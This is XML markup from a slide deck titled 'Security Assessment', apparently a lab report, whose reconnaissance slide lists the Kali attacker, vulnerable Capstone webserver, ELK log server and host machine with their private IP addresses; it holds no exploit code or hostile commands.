              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="676080"/>
            <a:ext cx="9143640" cy="364320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="290" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419760" y="1198800"/>
          <a:ext cx="8346240" cy="3576600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2782080"/>
                <a:gridCol w="2782080"/>
                <a:gridCol w="2782080"/>
              </a:tblGrid>
              <a:tr h="403200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hostname</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Red vs Blue (ML-RefVm-684427)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1 (10.0.0.11)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hosting Azure Hyper-V Virtual Machine - Hosting the VMs Kali, Capstone, and ELK.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacking Machine used for the penetration testing.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerable Target Machine hosting an online webserver. </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK Server</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ElasticSearch Log Server logging all traffic and network data for the Capstone server.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
